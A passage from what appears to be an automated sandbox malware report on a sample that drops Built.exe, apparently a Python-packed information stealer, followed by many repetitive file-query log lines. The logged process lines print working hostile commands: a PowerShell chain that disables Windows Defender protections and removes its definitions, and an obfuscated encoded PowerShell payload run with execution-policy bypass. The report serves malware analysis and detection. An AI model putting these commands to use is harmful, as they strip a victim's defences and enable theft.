b0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab

Source: 47SXvEQ.exe, 47SXvEQ.exe, 00000000.00000002.1714111175.0000000001074000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: AProgram Manager

Source: C:\Users\user\AppData\Local\Temp\Built.exe

Code function: 4_2_00007FF6266695E0 cpuid

4_2_00007FF6266695E0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\_ctypes.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\libcrypto-1_1.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\libffi-7.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\python310.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\rarreg.key VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\select.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\sqlite3.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\VCRUNTIME140.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\_ctypes.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\_lzma.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI54322\base_library.zip VolumeInformation	Jump to behavior
